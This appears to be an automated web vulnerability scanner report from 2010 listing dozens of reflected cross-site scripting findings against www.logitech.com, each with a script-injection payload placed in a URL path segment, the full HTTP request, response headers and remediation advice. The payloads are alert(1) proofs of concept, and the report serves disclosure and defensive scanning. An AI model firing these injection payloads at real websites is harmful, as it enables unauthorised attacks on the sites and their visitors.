<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9154"><script>alert(1)</script>a20a8769043 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items/devices/7619f9154"><script>alert(1)</script>a20a8769043 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a2c3</script><script>alert(1)</script>c321f047bec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items/devices/76195a2c3</script><script>alert(1)</script>c321f047bec HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:58:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bead</script><script>alert(1)</script>e4b246f7c30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /8bead</script><script>alert(1)</script>e4b246f7c30/promotional-items/devices/7627 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 920dc"%3bce442d157e was submitted in the REST URL parameter 1. This input was echoed as 920dc";ce442d157e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us920dc"%3bce442d157e/promotional-items/devices/7627 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3633c"><script>alert(1)</script>680ddca176d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us3633c"><script>alert(1)</script>680ddca176d/promotional-items/devices/7627 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997cb"><script>alert(1)</script>f08f6c25005 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items997cb"><script>alert(1)</script>f08f6c25005/devices/7627 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c850</script><script>alert(1)</script>38cabe57754 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items5c850</script><script>alert(1)</script>38cabe57754/devices/7627 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7a2b</script><script>alert(1)</script>728e255e179 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items/devicesf7a2b</script><script>alert(1)</script>728e255e179/7627 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fcfa"><script>alert(1)</script>574bdb84c7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items/devices4fcfa"><script>alert(1)</script>574bdb84c7b/7627 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69645</script><script>alert(1)</script>b327cfc0f6b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items/devices/762769645</script><script>alert(1)</script>b327cfc0f6b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26612"><script>alert(1)</script>7fe02f92f2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items/devices/762726612"><script>alert(1)</script>7fe02f92f2e HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c111a"%3bc65b0b4f869 was submitted in the REST URL parameter 1. This input was echoed as c111a";c65b0b4f869 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usc111a"%3bc65b0b4f869/promotional-items/devices/7744 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd244</script><script>alert(1)</script>05495a7cb85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bd244</script><script>alert(1)</script>05495a7cb85/promotional-items/devices/7744 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb21"><script>alert(1)</script>6a7b3f19f9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-uscbb21"><script>alert(1)</script>6a7b3f19f9a/promotional-items/devices/7744 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8ef8</script><script>alert(1)</script>a50866a82e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-itemse8ef8</script><script>alert(1)</script>a50866a82e2/devices/7744 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2515a"><script>alert(1)</script>a1b97632a4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items2515a"><script>alert(1)</script>a1b97632a4f/devices/7744 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6fa4</script><script>alert(1)</script>f6f97a22b91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items/devicesd6fa4</script><script>alert(1)</script>f6f97a22b91/7744 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7310"><script>alert(1)</script>1fba99a3c15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items/devicesf7310"><script>alert(1)</script>1fba99a3c15/7744 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61c83</script><script>alert(1)</script>1e9eee1eaf1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/promotional-items/devices/774461c83</script><script>alert(1)</script>1e9eee1eaf1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f734e"><script>alert(1)</script>67f665011d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/promotional-items/devices/7744f734e"><script>alert(1)</script>67f665011d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a1b3</script><script>alert(1)</script>441a03329c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7a1b3</script><script>alert(1)</script>441a03329c0/remotes/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c4f7"><script>alert(1)</script>e3a4ecfc3fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us8c4f7"><script>alert(1)</script>e3a4ecfc3fc/remotes/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8aaa</script><script>alert(1)</script>51dc6d4151c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotesf8aaa</script><script>alert(1)</script>51dc6d4151c/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5951"><script>alert(1)</script>bc966bc0eb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/remotesb5951"><script>alert(1)</script>bc966bc0eb9/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 155d9"><script>alert(1)</script>2350cd426e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us155d9"><script>alert(1)</script>2350cd426e0/remotes/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50121</script><script>alert(1)</script>d50088bda15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /50121</script><script>alert(1)</script>d50088bda15/remotes/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b48a</script><script>alert(1)</script>7b4e2b4b717 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/remotes8b48a</script><script>alert(1)</script>7b4e2b4b717/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee492"><script>alert(1)</script>a7c0eedde5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/remotesee492"><script>alert(1)</script>a7c0eedde5a/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:50 GMT Connection: close
